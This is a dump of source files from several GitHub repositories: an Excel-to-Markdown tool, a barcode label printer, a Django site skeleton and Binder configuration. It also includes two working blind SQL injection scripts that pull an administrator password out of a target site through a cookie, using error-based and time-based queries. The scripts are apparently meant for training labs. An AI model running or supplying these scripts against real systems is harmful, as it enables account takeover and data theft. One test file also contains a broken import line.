page\n\nFurther functionality:\n- Sub-tasks\n- group tasks by project\n- Assign other users to your tasks?\n- admin user functionality\n- Multiple lists\n\n================\nMM-DD-YY\n\n[1-12]-[1-31]-[13-99]\n\n^((0[0-9])|(1[0-2]))-((0[1-9])|(1|2)[0-9]|(3[0|1]))-((1[3-9])|([2-9][0-9]))" } ]
4
DamonSnow/excelmd
https://github.com/DamonSnow/excelmd
7f8f8607acedb59f2b1dc74420514c7635fa9b03
5107cf578e60bdbf2fa6ae8f4df5765c53c35ec6
303af3866b518c51e7c870ae3bd402a27ad02c30
refs/heads/master
2020-03-25T15:34:33.771851
2018-08-07T15:06:00
2018-08-07T15:06:00
143,890,123
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5336266756057739, "alphanum_fraction": 0.5461973547935486, "avg_line_length": 27.428571701049805, "blob_id": "c3723f4f05dfdf38e0d671e4591684d8ebfd1936", "content_id": "306d3f4ddb02cefc7043bbbc99e9e9d6aa81fcd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 82, "num_lines": 56, "path": "/exceltomd.py", "repo_name": "DamonSnow/excelmd", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n#python\n#用于实现将excel文件转为markdown文件\n\nimport codecs\nimport xlrd\n\n\n\ndef excelToMd(origin_url,save_url,save_as):\n # 打开文件\n workbook = xlrd.open_workbook(origin_url)\n # 获取所有sheet\n # print(workbook.sheet_names()) # [u'sheet1', u'sheet2']\n # sheet2_name = workbook.sheet_names()\n\n # 根据sheet索引或者名称获取sheet内容\n sheet2 = workbook.sheet_by_index(0) # sheet索引从0开始\n # sheet2 = workbook.sheet_by_name('sheet2')\n md_url_file = '%s%s.md' % (save_url, save_as) # 文件名连接第一列和第二列\n file = codecs.open(md_url_file, 'w', \"utf-8\") # 写入文件名\n # sheet的名称,行数,列数\n # print(sheet2.name, sheet2.nrows, sheet2.ncols)\n rowfilter = []\n str = ''\n for i in range(0,sheet2.nrows):\n if i > 0:\n row = list(map(lambda x : '^' if x == '' else x,sheet2.row_values(i)))\n res = list(map(lambda x: x.replace('\\n', '<br/>'), row))\n rowfilter.append('|'.join(res))\n else:\n row = sheet2.row_values(i)\n res = list(map(lambda x: x.replace('\\n', '<br/>'), row))\n rowfilter.append('|'.join(res))\n split_str = '|---' * sheet2.ncols\n rowfilter.append(split_str)\n for i in rowfilter:\n if rowfilter.index(i) == 1:\n str = i + '|\\n'\n else:\n str = '|' + i + '|\\n'\n # print(str)\n file.write(str)\n file.close()\n\n\n\nif __name__ == '__main__':\n # 指定excel的地址\n excel_url = r'F:\\\\markdown\\\\control_plan.xlsx'\n\n # 指定mark文档输入地址\n\n md_url = 'F:\\\\markdown\\\\'\n save_as = 'control_plan'\n excelToMd(excel_url,md_url,save_as)" } ]
1
gugumice/barcode
https://github.com/gugumice/barcode
9edb6d2d52ed300f64fdb8f353f1d596831ae9f4
c129d1c5c596bca75115e2cd15adc147120ea4e0
87b95d858d8ce1c3e85fb37aa499fd9f59c07595
refs/heads/master
2020-03-24T21:03:08.209172
2020-01-08T05:09:33
2020-01-08T05:09:33
143,011,395
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7657004594802856, "alphanum_fraction": 0.7789855003356934, "avg_line_length": 25.70967674255371, "blob_id": "4aed7991ab132ca54dbe21cc4d9382910207d425", "content_id": "6562ad8e357be205f972a3c38a560b9567fafc2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 828, "license_type": "no_license", "max_line_length": 96, "num_lines": 31, "path": "/README.md", "repo_name": "gugumice/barcode", "src_encoding": "UTF-8", "text": "# barcode\nreads barcode from scanner (currently HT-300) and prints it on ZEBRA TLP-2824\nThis version tested on PiIII, RASPBIAN STRETCH LITE\nVersion:June 2018\n\nRequires CUPS, ZEBRA (https://pypi.org/project/zebra/)\nPYTHON\n- sudo pip install zebra pyserial\n\nhttps://drupalista.net/blog/raspberry-pi-install-printer-raspbian-lite\n\n$ sudo apt-get install\n\n! Cups-bsd is IMPORTANT for lpr to function\n\nCUPS printer setup:\n- sudo cupsctl --remote-admin --remote-anyifconfig\n- sudo usermod -a -G lpadmin pi\n\nAdd printer, choose ZEBRA\n- Set Make to RAW\n\nAuto run un startup:\n\n- sudo cp barcode.service /etc/systemd/system/barcode.service\n- sudo systemctl enable barcode.service\n\nDisable auto run:\n- sudo systemctl disable barcode.service\n\nIf more than one printer is configured in CUPS, script will ask which printer to use for labels.\n" }, { "alpha_fraction": 0.3922918140888214, "alphanum_fraction": 0.4099564254283905, "avg_line_length": 29.586956024169922, "blob_id": "450f43f7e48d6f456b9013d35f8e413c92b52aaf", "content_id": "48843fc1a47380e6833f3a682f0b6538f41c1a65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4359, "license_type": "no_license", "max_line_length": 120, "num_lines": 138, "path": "/barcode.py", "repo_name": "gugumice/barcode", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\r\nfrom zebra import zebra\r\nfrom string import Template\r\nimport logging, sys, socket, os\r\nimport serial\r\n\r\nprint os.path.dirname(os.path.abspath(sys.argv[0]))\r\n\r\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\r\n\r\nLBL_FILE='lblTemplate.txt'\r\nCOPIES=1\r\n\r\n#class for barcode reader\r\n\r\nclass bcr(object):\r\n def __init__(self, port='/dev/ttyACM0',\r\n timeout=1):\r\n self.bc=()\r\n try:\r\n self.fp=serial.Serial(port=port,timeout=timeout)\r\n except Exception as e:\r\n print('Canot open: {}\\n{}'.format(port,e))\r\n sys.exit(1)\r\n def readBC(self):\r\n buffer=self.fp.readline()\r\n return(buffer.strip('\\n'))\r\n\r\n#class for printing labels\r\n\r\nclass lbl(object):\r\n def __init__(self, queue=1):\r\n self.zebra=zebra()\r\n self.lblText=''\r\n try:\r\n self.zebra.setqueue(self.zebra.getqueues()[queue])\r\n except:\r\n logging.debug('Queue {} not found!'.format(queue))\r\n sys.exit(1)\r\n try:\r\n fl='{}/{}'.format(os.path.dirname(os.path.abspath(sys.argv[0])),LBL_FILE)\r\n with open(fl) as f:\r\n self.lblText=f.read()\r\n logging.debug('Reading from {}'.format(fl))\r\n except:\r\n logging.debug('Error reading from {}. Using defaults'.format(LBL_FILE))\r\n self.lblText='''\r\n\r\n^XA\r\n#label darkness 0-30\r\n~SD10\r\n#label offset width,height\r\n^LH20,10^MTT\r\n^FO0,0\r\n^AS\r\n^FDEGL^FS\r\n^FO0,35\r\n^AQ\r\n^FD$hostName ^FS\r\n^FO30,150\r\n^AS\r\n^FD$barCode^FS\r\n^FO0,65\r\n^GB200,2,2\r\n^FS\r\n^BY2,3,105\r\n^FT20,150\r\n^BCN,80,N,N\r\n^FD>;$barCode^FS\r\n^PQ$numCopies\r\n^XZ\r\n'''\r\n\r\n\r\n self.lblSave()\r\n\r\n def lblSave(self):\r\n try:\r\n with open(LBL_FILE,'w') as f:\r\n f.write(self.lblText)\r\n except:\r\n logging.debug('Cannot write to {}'.format(LBL_FILE))\r\n\r\n def lblPrint(self, barCode=\"12345678\", numCopies=1):\r\n t=Template(self.lblText)\r\n #print(self.__cleanBc(barCode))\r\n lblStr=t.substitute(hostName=socket.gethostname(), barCode=self.__cleanBc(barCode), numCopies=numCopies)\r\n self.zebra.output(lblStr)\r\n\r\n def __cleanBc(self, barCode):\r\n b=[]\r\n for s in barCode:\r\n if 32 <= ord(s) <=127:\r\n b += s\r\n return(\"\".join(b))\r\n\r\nif __name__ == '__main__':\r\n z=zebra()\r\n zQueues=z.getqueues()\r\n q=0\r\n i=0\r\n if(len(zQueues))==1:\r\n z.setqueue(zQueues[0])\r\n logging.debug('Printer: {}'.format(zQueues[0]))\r\n else:\r\n for q in zQueues:\r\n i+=1\r\n print('{}. {}'.format(i,q))\r\n try:\r\n q=input('Select printer ({}):'.format(i))\r\n except:\r\n q=i\r\n if not 0 <= q-1 <= i-1:\r\n print('{} - invalid option'.format(q))\r\n z=None\r\n sys.exit(1)\r\n print('<{}> selected'.format(zQueues[q-1]))\r\n lb=lbl(q-1)\r\n bc=bcr()\r\n done = False\r\n lblPref=''\r\n lblStr=''\r\n try:\r\n while not done:\r\n lblStr=(bc.readBC())\r\n if len(lblStr)>0:\r\n if lblStr[0]==\"#\":\r\n lblPref=lblStr[1:]\r\n lblStr=''\r\n else:\r\n #print('{}'.format(lblPref+lblStr))\r\n lb.lblPrint(lblPref+lblStr, COPIES)\r\n lblPref=''\r\n\r\n print('*')\r\n time.sleep(.5)\r\n except KeyboardInterrupt:\r\n print('Interrupted')\r\n" }, { "alpha_fraction": 0.5616196990013123, "alphanum_fraction": 0.5713028311729431, "avg_line_length": 26.047618865966797, "blob_id": "00c3bc3973b590cc7ccb882d6e410e00985633d1", "content_id": "dfc5bc59b6c57a5d3e648c0a48a45fb1ce283258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1136, "license_type": "no_license", "max_line_length": 64, "num_lines": 42, "path": "/t1.py", "repo_name": "gugumice/barcode", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom queue import Queuequeue.LifoQueue\nfrom threading import Thread, Event\nfrom time import sleep\nfrom random import randint\n# A thread that produces data\ndef producer(out_q):\n while True:\n data=randint(1,51)\n print(data)\n sleep(.2)\n # Make an (data, event) pair and hand it to the consumer\n if data == 5:\n print('data sent {}'.format(data))\n evt = Event()\n out_q.put((data, evt))\n # Wait for the consumer to process the item\n evt.wait()\n# A thread that consumes data\ndef consumer(in_q):\n print('consumer waiting')\n while True:\n # Get some data\n data, evt = in_q.get()\n # Process the data\n \n print('Data received {}'.format(data))\n sleep(5)\n # Indicate completion\n evt.set()\ndef main():\n #q = Queue.LifoQueue(maxsize=1)\n q = Queue.LifoQueue()\n t1 = Thread(target=consumer, args=(q,))\n t2 = Thread(target=producer, args=(q,))\n t1.start()\n t2.start()\nif __name__==\"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n pass\n" } ]
3
Javad2383/doctor
https://github.com/Javad2383/doctor
41b7d11ef9d35409c9181b13ffc471560c5cd558
0bd1e6d7be0af4becd2832f571b6315a5fa43de1
2ce90eec315a823de8355918ee062b3479d77473
refs/heads/master
2023-06-16T13:30:51.993806
2021-07-11T14:55:37
2021-07-11T14:55:37
384,974,579
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7037037014961243, "alphanum_fraction": 0.7037037014961243, "avg_line_length": 21.33333396911621, "blob_id": "6fddcecf1609372b72d0c66ade771133cdf97a63", "content_id": "6f26f02432367f1f3a115312b81be8c5d0f4968c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/site_views/views.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n\ndef site_index(request):\n context = {}\n return render(request, \"pgs/index.html\", context)\n\n" }, { "alpha_fraction": 0.744966447353363, "alphanum_fraction": 0.744966447353363, "avg_line_length": 23.83333396911621, "blob_id": "f08d257bc54a08280656c8a6ce584c59f046fd7f", "content_id": "5d08a1392cc4aad6490c0a0a5494fe2246010e9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/site_user/apps.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SiteUserConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'site_user'\n" }, { "alpha_fraction": 0.748344361782074, "alphanum_fraction": 0.748344361782074, "avg_line_length": 24.16666603088379, "blob_id": "6074728799404a67c732997e26f81feacab5d2d5", "content_id": "9a110dafe991cc279d525f6b4a6552936c402fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/site_views/apps.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SiteViewsConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'site_views'\n" }, { "alpha_fraction": 0.7257462739944458, "alphanum_fraction": 0.7257462739944458, "avg_line_length": 47.727272033691406, "blob_id": "aefa46e53f531aca72aaef73b64f1bce90b55fb6", "content_id": "35b71b0f01750aa953892867ed05e0503276e19f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "no_license", "max_line_length": 120, "num_lines": 11, "path": "/site_user/urls.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (site_login, site_register_doctor, site_register_choice, site_register_patient, site_forgot_password)\n\napp_name = \"User\"\nurlpatterns = [\n path('login', site_login, name=\"login_view\"),\n path('register-doctor', site_register_doctor, name=\"register_doctor\"),\n path('register-patient', site_register_patient, name=\"register_patient\"),\n path('register-type', site_register_choice, name=\"register_type\"),\n path('forgot-password', site_forgot_password, name=\"forgot_password\"),\n]\n" }, { "alpha_fraction": 0.6746031641960144, "alphanum_fraction": 0.6746031641960144, "avg_line_length": 30.5, "blob_id": "146acfc87f96cf6e66c0d129b82c85004ec4be2d", "content_id": "0a0ade0b68347ae09cc9db6fef03bdd3dee85e36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 63, "num_lines": 8, "path": "/doctor/urls.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('', include('site_views.urls', namespace=\"Views\")),\n path('user/', include('site_user.urls', namespace=\"User\")),\n path('admin/', admin.site.urls),\n]\n" }, { "alpha_fraction": 0.6736111044883728, "alphanum_fraction": 0.6736111044883728, "avg_line_length": 19.571428298950195, "blob_id": "3ae234e23089961faf407094341ea4ca0e0f0ff0", "content_id": "a9ac4d6ae38ce76befc4d57c79af0b81f399d737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/site_views/urls.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (site_index)\n\napp_name = 'Views'\nurlpatterns = [\n path('', site_index, name=\"index_view\"),\n]\n" }, { "alpha_fraction": 0.7014681696891785, "alphanum_fraction": 0.7014681696891785, "avg_line_length": 22.576923370361328, "blob_id": "d33156f6fde99991b8e674516de169ab76e8bdd4", "content_id": "966dda6953f73548b406c8962cc3e5bb86b0ad11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 65, "num_lines": 26, "path": "/site_user/views.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n\ndef site_login(request):\n context = {}\n return render(request, \"user/login.html\", context)\n\n\ndef site_register_choice(request):\n context = {}\n return render(request, \"user/register_choice.html\", context)\n\n\ndef site_register_doctor(request):\n context = {}\n return render(request, \"user/register_doctor.html\", context)\n\n\ndef site_register_patient(request):\n context = {}\n return render(request, \"user/register_patient.html\", context)\n\n\ndef site_forgot_password(request):\n context = {}\n return render(request, \"user/forgot_password.html\", context)\n" } ]
7
mefeleth/Blind-SQL-Injection
https://github.com/mefeleth/Blind-SQL-Injection
b0eaded494769d2340ef2d9a44b1b6f5c3b4ff81
a16dac8d94b89f5f73b6c2a9910b38d96ff1a61d
fe58a9ecefb1167960312932717f8b33f511052d
refs/heads/master
2023-05-05T22:34:45.960874
2021-05-22T16:12:53
2021-05-22T16:12:53
369,852,288
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6034361720085144, "alphanum_fraction": 0.6164095401763916, "avg_line_length": 38.0684928894043, "blob_id": "bc09fc6fe8fdb07953d2de28dd2440f6b899ef9f", "content_id": "664bab5666c0f8dbdad1226b1063c96cebc05163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2852, "license_type": "no_license", "max_line_length": 207, "num_lines": 73, "path": "/sqli_case_when.py", "repo_name": "mefeleth/Blind-SQL-Injection", "src_encoding": "UTF-8", "text": "import requests\nimport optparse\n\npassword = \"\"\npassword_length = 0\n\ndef get_args():\n parser = optparse.OptionParser()\n parser.add_option(\"-u\", \"--url\", dest=\"url\", help=\"URL in format http(s)://<url>\")\n parser.add_option(\"-s\", \"--session\", dest=\"session\", help=\"Session cookie in format: cookie_name=cookie_value\")\n parser.add_option(\"-t\", \"--token\", dest=\"cookie\", help=\"Token cookie in format: token_name=token_value\")\n (options, arguments) = parser.parse_args()\n if not options.url:\n parser.error(\"[-] Please specify url, use --help for more info.\")\n elif not options.session:\n parser.error(\"[-] Please specify session cookie, use --help for more info.\")\n elif not options.cookie:\n parser.error(\"[-] Please specify token cookie, use --help for more info.\")\n return options\n\noptions = get_args()\nurl = options.url\nsession = options.session\ncookie = options.cookie\n\ndef check_if_vulnerable(url,session,cookie):\n response1 = requests.get(url,\n headers={'Cookie':cookie+'\\'; '+session})\n response2 = requests.get(url,\n headers={'Cookie':cookie+'\\'\\'; '+session})\n if response1.status_code == 500 and response2.status_code == 200:\n print(\"[+] Target probably vulnerable\")\n else:\n print(\"[-] Target might not be vulnerable\")\n\n\ndef check_password_length(url,session,cookie):\n for i in range(1,30,1):\n response = requests.get(url,\n headers={'Cookie':cookie+'\\' UNION SELECT CASE WHEN (username=\\'administrator\\' AND LENGTH(password) = '\n +str(i)+') THEN to_char(1/0) ELSE NULL END FROM users--; '+session})\n if response.status_code == 500:\n password_length = i\n print(\"[+] Password length is \" + str(password_length))\n return password_length\n if password_length == 0:\n print(\"[-] Could not find password length\") \n\n\ndef make_req(url,session,cookie):\n password_length = check_password_length(url,session,cookie)\n password = \"\"\n charString = \"0123456789abcdefghijklmnopqrstuvwxyz\"\n for i in range(1,password_length+1,1):\n for j in charString:\n response = requests.get(url,\n headers={'Cookie':cookie+'\\' UNION SELECT CASE WHEN (username=\\'administrator\\' AND SUBSTR(password,'+str(i)+',1)=\\''+str(j)+'\\') THEN to_char(1/0) ELSE NULL END FROM users--; '+session})\n if response.status_code == 500:\n password += j\n print(\"[*] Discovering password: \" + password)\n else:\n continue\n # if password not empty\n if password:\n print(\"[+] The password is \" + password)\n return password\n else:\n print(\"[-] Could not find password. Exiting...\")\n exit(1)\n\n\ncheck_if_vulnerable(url, session, cookie)\nmake_req(url, session, cookie)\n" }, { "alpha_fraction": 0.6102418303489685, "alphanum_fraction": 0.6223328709602356, "avg_line_length": 39.753623962402344, "blob_id": "3c94c3b8ddb7fcead32daee8dd97d08334bc133b", "content_id": "a129b7fd85df74a508161ea1f22ad53fee2f2f36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2812, "license_type": "no_license", "max_line_length": 213, "num_lines": 69, "path": "/time_based.py", "repo_name": "mefeleth/Blind-SQL-Injection", "src_encoding": "UTF-8", "text": "import requests\nimport optparse\nimport math\n\npassword = \"\"\npassword_length = 0\n\ndef get_args():\n parser = optparse.OptionParser()\n parser.add_option(\"-u\", \"--url\", dest=\"url\", help=\"URL in format http(s)://<url>\")\n parser.add_option(\"-s\", \"--session\", dest=\"session\", help=\"Session cookie in format: cookie_name=cookie_value\")\n parser.add_option(\"-t\", \"--token\", dest=\"cookie\", help=\"Token cookie in format: token_name=token_value\")\n (options, arguments) = parser.parse_args()\n if not options.url:\n parser.error(\"[-] Please specify url, use --help for more info.\")\n elif not options.session:\n parser.error(\"[-] Please specify session cookie, use --help for more info.\")\n elif not options.cookie:\n parser.error(\"[-] Please specify token cookie, use --help for more info.\")\n return options\n\noptions = get_args()\nurl = options.url\nsession = options.session\ncookie = options.cookie\n\ndef check_if_vulnerable(url,session,cookie):\n response = requests.get(url,\n headers={'Cookie':cookie+'\\'||pg_sleep(10)--; '+session})\n if response.elapsed.total_seconds() >= math.floor(10):\n print(\"[+] Target probably vulnerable\")\n else:\n print(\"[-] Target might not be vulnerable\")\n\ndef check_password_length(url,session,cookie):\n for i in range(1,30,1):\n response = requests.get(url,\n headers={'Cookie':cookie+'\\'||(SELECT CASE WHEN (username=\\'administrator\\' AND LENGTH(password) = '+str(i)+') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users)||\\'; '+session})\n if response.elapsed.total_seconds() >= math.floor(10):\n password_length = i\n print(\"[+] Password length is \" + str(password_length))\n return password_length\n if password_length == 0:\n print(\"[-] Could not find password length\") \n\n\ndef make_req(url,session,cookie):\n password_length = check_password_length(url,session,cookie)\n password = \"\"\n charString = \"0123456789abcdefghijklmnopqrstuvwxyz\"\n for i in range(1,password_length+1,1):\n for j in charString:\n response = requests.get(url,\n headers={'Cookie':cookie+'\\'||(SELECT CASE WHEN (username=\\'administrator\\' AND SUBSTRING(password,'+str(i)+',1) = \\''+str(j)+'\\') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)||\\'; '+session})\n if response.elapsed.total_seconds() >= math.floor(4.5):\n password += j\n print(\"[*] Discovering password: \" + password)\n else:\n continue\n # if password not empty\n if password:\n print(\"[+] The password is \" + password)\n return password\n else:\n print(\"[-] Could not find password. Exiting...\")\n exit(1)\n\ncheck_if_vulnerable(url, session, cookie)\nmake_req(url, session, cookie)\n" }, { "alpha_fraction": 0.7978494763374329, "alphanum_fraction": 0.7989247441291809, "avg_line_length": 92, "blob_id": "9ab1784e58aaaa8a2a8fa69346ee8565e072ab12", "content_id": "be1a4b90de886afc05c7e83b725403675530f304", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 930, "license_type": "no_license", "max_line_length": 491, "num_lines": 10, "path": "/README.md", "repo_name": "mefeleth/Blind-SQL-Injection", "src_encoding": "UTF-8", "text": "# Conditional Error-based Blind SQL Injection - Oracle DB\nScript for performing Conditional Error-based Blind SQL Injection on Oracle Database, where the injection point is a tracking cookie. This attack was used to obtain administrator password from users table\n\nUsage: \npython3 -u http(s)://\\<url\\> -s session_cookie_name=session_cookie_value -t token_name=token_value \\<script_name\\>.py\n\nExample: \n![Alt text](/example.png?raw=true)\n\nThese tools are for educational purposes and legal activity only, meaning that you can use them solely on the systems that you have specific written permission to do so. Any actions and/or activities related to these tools are solely your responsibility. The misuse of these tools can result in criminal charges brought against the persons in question. I will not be held responsible in the event any criminal charges be brought against any individuals misusing these tools to break the law.\n" } ]
3
Kwuarm/Laboration-2
https://github.com/Kwuarm/Laboration-2
fd2196c59555f410e9e9c8db0112825e4c6af593
f061ba5093aa5291ddd2c4172f56e7700caba851
0f4e9511edd5d4385d8e274c143e67d81d89e264
refs/heads/master
2020-12-22T23:17:05.747607
2020-01-29T10:49:07
2020-01-29T10:49:07
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 10.666666984558105, "blob_id": "ee91dba1d7c8c0d93bbbca5a3bdb51dfef1419c8", "content_id": "865f1d82ec196360b407232583ee8bea77e3571a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/i9i8i7/program.py", "repo_name": "Kwuarm/Laboration-2", "src_encoding": "UTF-8", "text": "import modul\r\n\r\nmodul.introduction()" }, { "alpha_fraction": 0.5225143432617188, "alphanum_fraction": 0.5291628837585449, "avg_line_length": 29.53333282470703, "blob_id": "9083e7e418dc3b8b895b05bcd306a1c721f673d6", "content_id": "d7beb06f5ad7dd00eea26576d07e66b29fb93deb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3313, "license_type": "no_license", "max_line_length": 75, "num_lines": 105, "path": "/i9i8i7/modul.py", "repo_name": "Kwuarm/Laboration-2", "src_encoding": "UTF-8", "text": "import csv\r\nimport json\r\n\r\ndef introduction():\r\n print(\"Välkommen till programmet.\")\r\n choice = \"\"\r\n epiclist = startup()\r\n\r\n while choice != 6:\r\n print(\"\\n[1] - Läs in csv-fil\")\r\n print(\"[2] - Visa json-data\")\r\n print(\"[3] - Lägg till person\")\r\n print(\"[4] - Ta bort person\")\r\n print(\"[5] - Spara fil\")\r\n print(\"[6] - Avsluta\")\r\n\r\n try:\r\n choice = int(input(\"Vilket alternativ vill du välja? \"))\r\n except ValueError:\r\n print(\"Oops! That's not a number!\")\r\n\r\n if choice == 1:\r\n epiclist = readfromfile()\r\n elif choice == 2:\r\n viewjson(epiclist)\r\n print(\"JSON-data has been shown\")\r\n elif choice == 3:\r\n addperson(epiclist)\r\n print(\"Personen har blivit tillagd!\")\r\n elif choice == 4:\r\n delperson(epiclist)\r\n print(\"Personen har tagits bort!\")\r\n elif choice == 5:\r\n saveasjson(epiclist)\r\n print(\"Filen har sparats!\")\r\n elif choice == 6:\r\n print(\"You have chosen to exit the program.\")\r\n else:\r\n print(\"Please choose a number 1-6!\")\r\n\r\ndef startup():\r\n epiclist = []\r\n try:\r\n with open('data.json', 'r', encoding='UTF-8') as File:\r\n print(\"Json filen finns! wow\")\r\n epiclist = json.load(File)\r\n except Exception as p:\r\n print(p)\r\n epiclist = readfromfile(False)\r\n #testa om csv filen finns\r\n return epiclist\r\n\r\ndef readfromfile(afterstartup = True):\r\n randomlist = []\r\n try:\r\n with open('personer.csv', newline='', encoding='UTF-8') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=';')\r\n for row in spamreader:\r\n #print(', '.join(row))\r\n d = {}\r\n d[\"fnamn\"] = row[0]\r\n d[\"enamn\"] = row[1]\r\n d[\"email\"] = row[3]\r\n randomlist.append(d)\r\n if (afterstartup):\r\n for line in randomlist:\r\n print(line)\r\n print(\"CSV-file has now been loaded.\")\r\n return randomlist\r\n except FileNotFoundError:\r\n print(\"File Not Found\")\r\n\r\ndef viewjson(epiclist):\r\n print(epiclist)\r\n # try:\r\n # with open('data.json') as data_file:\r\n # print(\"Successful\")\r\n # except:\r\n # saveasjson(epiclist)\r\n # with open('data.json') as data_file:\r\n # data_loaded = json.load(data_file)\r\n # for lines in data_loaded:\r\n # print(lines)\r\n\r\ndef addperson(epiclista):\r\n addstuff = {}\r\n addstuff[\"fnamn\"] = input(\"Skriv in namn: \")\r\n addstuff[\"enamn\"] = input(\"Skriv in efternamn: \")\r\n addstuff[\"email\"] = input(\"Skriv in email: \")\r\n print(addstuff)\r\n epiclista.append(addstuff)\r\n return epiclista\r\n\r\ndef delperson(epiclist):\r\n try:\r\n deleteperson = int(input(\"Vem vill du ta bort? Nummer: \"))\r\n epiclist.pop(deleteperson)\r\n print(f'Removed person number: {deleteperson}!')\r\n except ValueError:\r\n print(\"Deletion of person has failed.\")\r\n return epiclist\r\n\r\ndef saveasjson(epiclist):\r\n with open('data.json', 'w', encoding='UTF-8') as outfile:\r\n json.dump(epiclist, outfile, ensure_ascii=False, indent=2)" } ]
2
andrewjohnlowe/binder_test
https://github.com/andrewjohnlowe/binder_test
3a6eb103e176483e03a846dff356948686b9c4f9
9c6f5329761d3dfa7694f5618f6dc7a9a1b024d6
6aa1a56d4aa9390e9b91242803e5a67e556acd1a
refs/heads/master
2021-08-26T03:41:27.864258
2017-11-21T13:44:40
2017-11-21T13:44:40
110,274,064
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7015384435653687, "alphanum_fraction": 0.7384615540504456, "avg_line_length": 16.105262756347656, "blob_id": "f897d56b361b42c84833f994750a37cb6ad8b933", "content_id": "5bd759449a7d87b331819fdbb67b2ea43e0f4d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 325, "license_type": "no_license", "max_line_length": 84, "num_lines": 19, "path": "/README.md", "repo_name": "andrewjohnlowe/binder_test", "src_encoding": "UTF-8", "text": "## Important\n\nTo convert Rmd to ipynb:\n\nFrom Anaconda Prompt:\n\n```\nnotedown --nomagic test.Rmd > test.ipynb\n```\n\nThen:\n\n```\npython rify.py test.ipynb\n```\n\nwhich will add the metadata so that the R kernel will start automatically in Binder.\n\n[Source](https://github.com/jupyterhub/binderhub/issues/261#issuecomment-345987238)\n" }, { "alpha_fraction": 0.6349206566810608, "alphanum_fraction": 0.658730149269104, "avg_line_length": 20, "blob_id": "fed650afb1f2816f9471050d99c1a92d30eba55e", "content_id": "e95e27a123d9dd6ef716da074ce54c284885a709", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 126, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/Dockerfile", "repo_name": "andrewjohnlowe/binder_test", "src_encoding": "UTF-8", "text": "FROM rocker/binder:3.4.2\n\n# Run install.r if it exists\nRUN if [ -f install.R ]; then R --quiet -f install.R; fi\n\nCOPY . $HOME\n" }, { "alpha_fraction": 0.4896421730518341, "alphanum_fraction": 0.4990583658218384, "avg_line_length": 18.66666603088379, "blob_id": "de6f00114323b0c266157c71ffafe7f27d2b2406", "content_id": "63f64e86408123d98521e7f148ada047135a3a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 531, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/rify.py", "repo_name": "andrewjohnlowe/binder_test", "src_encoding": "UTF-8", "text": "import sys\nimport json\n\nrspec = {\n \"kernelspec\": {\n \"display_name\": \"R\",\n \"language\": \"R\",\n \"name\": \"ir\"\n },\n \"language_info\": {\n \"codemirror_mode\": \"r\",\n \"file_extension\": \".r\",\n \"mimetype\": \"text/x-r-source\",\n \"name\": \"R\",\n 